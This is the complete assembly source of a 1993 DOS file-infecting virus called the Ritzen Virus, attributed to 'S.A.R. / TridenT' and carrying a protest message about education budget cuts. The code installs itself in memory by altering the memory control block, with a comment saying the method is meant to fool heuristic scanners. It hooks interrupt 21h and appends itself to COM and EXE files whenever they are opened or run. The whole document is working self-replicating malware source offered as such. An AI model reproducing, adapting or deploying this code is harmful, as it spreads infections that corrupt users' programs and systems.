;*****************************************************************************
;*									     *
;*    The Ritzen Virus 							     *
;*									     *
;*    (c) '93, by S.A.R. (Students Agains Ritzen) / TridenT	     	     *
;*									     *	
;*****************************************************************************

		.model tiny
		.radix 16
		.code

len		equ	offset last - atlantic
len_para	equ	len /10h

mem_size	equ	60h

		org	100h


dummy:		db	0e9h,00h,00h			; dummy file,
							; contains jump to
							; virus code.

atlantic:	call    get_ip				
		sub	bp,offset atlantic+3
		
rest_host:	push	ds
		pop	ax
		mov	cs:[segm+bp],ax
		cmp	cs:[type_host+bp],'E'		; check if host
		je	fix_exe				; is COM or EXE.

fix_com:	lea	si,cs:[com_start+bp]		; fix start of
		mov	ax,es
		inc	ax
		mov	es,ax
		mov	di,00F0h			; com host with
		mov	cx,03h				; original data.
		rep	movsb		
		
		mov	ax,es
		dec	ax
		mov	es,ax

		mov	ax,0100h			; IP start at 0100h.
		push	cs				; store segment+IP 
		push    ax				; on stack.
		jmp	chk_resident

fix_exe:	mov	ax,cs:[exe_cs+bp]		; CS and IP on stack
		mov	bx,ax
		mov	ax,ds
		add	ax,bx
		add	ax,10h
		push	ax
		mov	bx,cs:[exe_ip+bp]
		push	bx				
		
chk_resident:	mov	dx,0aaaah
		mov	ax,3000h
		int	21h
		cmp	dx,0bbbbh
		je	end_install

mem_install:	push	ds				; let DS points
		push	ds
		pop	ax				; to MCB
		dec	ax				; 2 times to fool
		dec	ax				; heuristic scanners
		push	ax
		pop	ds
		cmp	byte ptr ds:[0010],5ah		; last MCB?
		jne	abort_install			; if no, quit.
		
		mov	ax,ds:[0013]			; adjust memory
		sub	ax,mem_size			; size.
		mov	ds:[0013],ax			; store size in MCB.

		pop	ds				; restore original
							; DS segment.
		
		sub	word ptr ds:[0002],mem_size	; don't forget to
							; adjust memory
							; size stored in
							; PSP to.

vir_install:	xchg	ax,bx				; install virus
		mov	ax,es					
		add	ax,bx				; AX = virussegment
		mov	es,ax				
		mov	cs:[vir_seg+bp],ax

		push	cs
		pop	ds
		 
		lea	si,[atlantic+bp]		; copy virus to
		lea	di,es:0103h			; memory
		mov	cx,len
copy:		movsb
		dec	cx
		jnz	copy

		push	ds
		pop	es
 
hook_i21h:	cli
		mov	ax,3521h
		int	21h

		mov	ds,cs:[vir_seg+bp]
		mov	[i21h],bx
		mov	[i21h+2],es

;		mov	dx, offset ds:[mine_i21h]
;		mov	ax,2521h
;		int	21h

		mov	ax,ds
		mov	bx,ax
		mov	dx, offset ds:[mine_i21h]
		xor	ax,ax
		mov	ds,ax
		mov	ds:[4*21h],dx
		mov	ds:[4*21h+2],bx	

		sti
		
		
abort_install:	mov	ax,cs:[segm+bp]
		push	ax
		pop	es
		push	es
		pop	ds

end_install:	retf

;*************************************************************************
;*									 *
;*		I N T E R U P T   H A N D L E R 			 *
;*									 *
;*************************************************************************

mine_i24h:	mov	al,03h
		iret

mine_i21h:	pushf					; check for
		cmp	ax,3000h			; virus ID
                jne     new_21h
		cmp	dx,0aaaah
                jne     new_21h
                mov     dx,0bbbbh                       ; return ID
		popf
		iret


new_21h:	push	ax				; save registers
		push	bx
		push	cx
		push	dx
		push	ds
		push	es
		push	di
		push	si

chk_open:	xchg	ax,bx
		cmp	bh,3dh				; open file?
		je	chk_com

chk_exec:	cmp	bx,04b00h			; execute file?
		je	chk_com

continu:	pop	si				; restore registers
		pop	di
		pop	es
		pop	ds
		pop	dx
		pop	cx
		pop	bx
		pop	ax

next:		popf					; call original
		jmp	dword	ptr cs:[i21h]		; interupt
	
;**************************************************************************
;*									  *
;*		C H E C K  C O M / E X E   F I L E 			  *
;*									  *
;**************************************************************************	


chk_com:	mov	cs:[name_seg],ds
		mov	cs:[name_off],dx
		cld

		mov	cx,0ffh
		push	ds
		pop	es
		push	dx
		pop	di
		mov	al,'.'
		repne	scasb
		cmp	word ptr es:[di],'OC'
                jne     chk_exe
		cmp	word ptr es:[di+2],'M'
                jne	continu
                jmp     infect_com



chk_exe:	cmp	word ptr es:[di],'XE'
		jne	continu
		cmp	word ptr es:[di+2],'E'
		jne 	continu
		jmp	infect_exe



;**************************************************************************
;*									  *
;*		I N F E C T   C O M - F I L E				  *
;*									  *
;**************************************************************************

infect_com:	call	init
		cmp	cs:[fout],0ffh
		je	close_file
		
		mov	cs:[type_host],'C'
		
		mov	ax,4200h	; go to start of file	
		call	mov_point
		
		mov	cx,03h
		mov	ah,3fh
		lea	dx,cs:[com_start]
		call	do_int21h
		
		mov	ax,4200h
		call	mov_point
		mov	ax,4202h
		call	mov_point

		sub	ax,03h
		mov	cs:[lenght_file],ax

		call	write_jmp
		call	write_vir

		call	save_date

close_file:	mov	bx,cs:[handle]
		mov	ah,3eh
		call	do_int21h
		
restore_int24h:	mov	dx,cs:[i24h]
		mov	ds,cs:[i24h+2]
		mov	ax,2524h
		call	do_int21h

		jmp	continu

;**************************************************************************
;*									  *
;*		I N F E C T   E X E - F I L E				  *
;*									  *
;************************************************************************** 	

infect_exe:	call	init
		cmp	cs:[fout],0ffh
		je	close_file
		mov	cs:[type_host],'E'

		mov	ax,4200h
		call	mov_point
		mov	ah,3fh
		mov	cx,18h
		lea	dx,[head_exe]
		call	do_int21h

		call	inf_exe

		call	save_date
		jmp	close_file		


;**************************************************************************
;*									  *
;*		R O U T I N E S						  *
;*									  *
;**************************************************************************

get_ip:		push	sp				; get ip from stack
		pop	bx	
		mov	ax, word ptr cs:[bx]
		mov	bp,ax
		ret
	
init:		mov	cs:[fout],00h
		
		call	int24h
		call	open_file
		jc	error
		call	set_atributes
                call    get_date
		call	chk_infect
		je	error
		ret

error:		mov	cs:[fout],0ffh
		ret


int24h:		push	cs
		pop	ds
		mov	ax,3524h
		call	do_int21h
		mov	cs:[i24h],bx
		mov	cs:[i24h+2],es
		mov	dx, offset mine_i24h
		mov	ax,2524h
		call	do_int21h
		ret

mov_point:	push	cs
		pop	ds
		mov	bx,cs:[handle]
		xor	cx,cx
		xor	dx,dx
		call	do_int21h	
		ret

open_file:	mov	ds,cs:[name_seg]
		mov	dx,cs:[name_off]
		mov	ax,3d02h
		call	do_int21h

		mov	cs:[handle],ax
		mov	bx,ax
		ret

set_atributes:	mov	ax,4200h
		mov	ds,cs:[name_seg]
		mov	dx,cs:[name_off]
		call	do_int21h
		and	cl,0feh
		mov	ax,4301h
		call	do_int21h
		ret

get_date:	mov	bx,cs:[handle]
		mov	ax,5700h
		call	do_int21h
		mov	cs:[date],dx
		mov	cs:[time],cx
		ret

chk_infect:	push	cs
		pop	ds
		mov	ax,4202h
		xor	cx,cx
		sub	cx,01h
		xor	dx,dx
		sub	dx,02h
		mov	bx,cs:[handle]
		call	do_int21h
		
		mov	ah,3fh
		mov	cx,02h
		lea	dx,cs:[file_id]
		call	do_int21h

		mov	al, byte ptr cs:[file_id]
		mov	ah, byte ptr cs:[file_id]+1
		cmp	ax,[virus_id]
		ret

write_jmp:	push	cs
		pop	ds
		mov	ax,4200h
		call	mov_point
		mov	ah,40h
		mov	cx,01h
		lea	dx,cs:[jump]
		call	do_int21h
		
		mov	ah,40h
		mov	cx,02h
		lea	dx,cs:[lenght_file]
		call	do_int21h
		ret
	
write_vir:	push	cs
		pop	ds
		mov	ax,4202h
		call	mov_point
		mov	ah,40h
		mov	cx,len
		mov	dx,103h
		call	do_int21h
		ret	

save_date:	mov	ax,5700h
		call	do_int21h
		mov	cs:[date],dx
		mov	cs:[time],cx
		ret
		
inf_exe:	mov	ax,word ptr cs:[head_exe+14h]
		mov	cs:[exe_ip],ax
		mov	ax, word ptr cs:[head_exe+16h]
		mov	cs:[exe_cs],ax

		mov	ax,4200h
		call	mov_point
		mov	ax,4202h
		call	mov_point
		mov	bx,10h
		div	bx
		sub	ax, word ptr cs:[head_exe+08h]
		mov	cs:[new_cs],ax
		mov	cs:[new_ip],dx

		call	write_vir

		mov	ax,4200h
		call	mov_point
		mov	ax,4202h
		call	mov_point
		mov	bx,0200h
		div	bx
		cmp	dx,0000h
		jne	not_zero
		jmp	zero
not_zero:	inc	ax
zero:		mov	word ptr cs:[head_exe+02h],dx
		mov	word ptr cs:[head_exe+04h],ax
		mov	ax,cs:[new_ip]
		mov	word ptr cs:[head_exe+14h],ax
		mov	ax,cs:[new_cs]
		mov	word ptr cs:[head_exe+16h],ax
		mov	word ptr cs:[head_exe+0Eh],ax
		add	word ptr cs:[head_exe+10],len_para
		
;		mov	word ptr cs:[head_exe+10],1000

		mov	ax,4200h
		call	mov_point

		mov	ah,40h
		mov	bx,cs:[handle]
		mov	cx,18h
		lea	dx,cs:[head_exe]

		call	do_int21h
		ret
		
do_int21h:	pushf
		call	dword ptr cs:[i21h]
		ret

;****************************************************************************
;*									    *
;*		D A T A							    *
;*									    *
;****************************************************************************

type_host	db	'C'
com_start	db	0cdh,20h,90h
message		db	" Dedicated to Ritzen, our Minister of Education and Science."
		db      " We are getting sick of your budget cuts so we hope that"
		db      " you get sick of this virus.."
		db	" (c) '93 by S.A.R. / TridenT ."
exe_cs		dw	?
exe_ip		dw	?
new_cs		dw	?
new_ip		dw	?
vir_seg		dw	?
i21h		dw	00h,00h
i24h		dw	00h,00h
name_seg	dw	?
name_off	dw	?
lenght_file	dw	?
head_exe	db	18 dup (?)
handle		dw	?
fout		db	?
file_id		dw	?
jump		db	0e9h
date		dw	?	
time		dw	?
segm		dw	?
virus_id	dw	"AP"
last		dw	"AP"

		end	dummy